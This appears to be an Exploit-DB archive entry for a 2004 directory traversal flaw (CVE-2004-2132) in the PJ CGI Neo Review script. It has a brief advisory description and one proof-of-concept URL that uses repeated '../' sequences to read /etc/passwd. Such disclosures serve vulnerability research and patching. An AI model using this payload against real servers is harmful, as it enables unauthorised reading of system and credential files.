PJ CGI Neo Review Directory Traversal Vulnerability

2004-01-29T00:00:00
ID EDB-ID:23615
Type exploitdb
Reporter Zone-h Security Team
Modified 2004-01-29T00:00:00

Description

PJ CGI Neo Review Directory Traversal Vulnerability. CVE-2004-2132. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/9524/info

It has been reported that PJ CGI Neo Review may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory by using '../' character sequences.

http://www.example.com/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd